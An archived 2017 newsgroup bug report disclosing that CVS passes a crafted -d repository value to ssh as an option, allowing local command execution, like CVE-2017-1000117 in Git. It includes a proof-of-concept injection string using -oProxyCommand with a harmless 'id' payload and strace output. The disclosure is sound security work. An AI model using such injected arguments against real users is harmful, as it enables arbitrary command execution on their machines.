Groups | Search | Server Info | Keyboard shortcuts | Login | Register [http] [https] [nntp] [nntps]

Groups > gnu.cvs.bug > #212

CVS and ssh command injection (see CVE-2017-1000117, etc.)

From Hank Leininger <hlein@korelogic.com>
Newsgroups gnu.cvs.bug
Subject CVS and ssh command injection (see CVE-2017-1000117, etc.)
Date 2017-08-10 22:19 -0600
Message-ID <mailman.12931.1502457337.21957.bug-cvs@nongnu.org> (permalink)

Show all headers | View raw

[Multipart message — attachments visible in raw view] - view raw

Bugs in Git, Subversion, and Mercurial were just announced & patched
which allowed arbitrary local command execution if a malicious name was
used for the remote server, such as starting with - to pass options to
the ssh client:

  git clone ssh://-oProxyCommand=some-command...

CVS has a similar problem with the -d option:

  $ strace -f -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada 2>&1 | egrep [^pu]id
  execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar", "co", "yada"], 0x7ffe69f75a68 /* 139 vars */) = 0
  [snip]
  [pid 20003] execve("/usr/local/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */ ) = -1 ENOENT (No such file or directory)
  [pid 20003] execve("/usr/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */) = 0
  [pid 20004] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"], 0x32af5f10d0 /* 141 vars */) = 0
  [pid 20004] execve("/usr/bin/id", ["id"], 0xec92226ae0 /* 141 vars */) = 0
  ssh_exchange_identification: Connection closed by remote host

Tested vanilla CVS 1.12.13, and Gentoo CVS 1.12.12-r11.

Of course, the repo specification looks very odd, so tricking a victim
may be harder than for SCM tools where it's prefixed by an ssh://, or
masked behind a redirect, or submodule paths may be followed without
user interaction.

See also:

  https://marc.info/?l=oss-security&m=150241876103454&w=2
  https://marc.info/?l=subversion-announce&m=150238900328980&w=2
  https://marc.info/?l=git&m=150238802328673&w=2
  https://subversion.apache.org/security/CVE-2017-9800-advisory.txt

Thanks,

-- 

Hank Leininger <hlein@korelogic.com>
5F6D DCC8 FF53 8093 EC39  127B 091E 7F7C E898 E86C

Back to gnu.cvs.bug | Previous | Next | Find similar

Thread

CVS and ssh command injection (see CVE-2017-1000117, etc.) Hank Leininger <hlein@korelogic.com> - 2017-08-10 22:19 -0600

csiph-web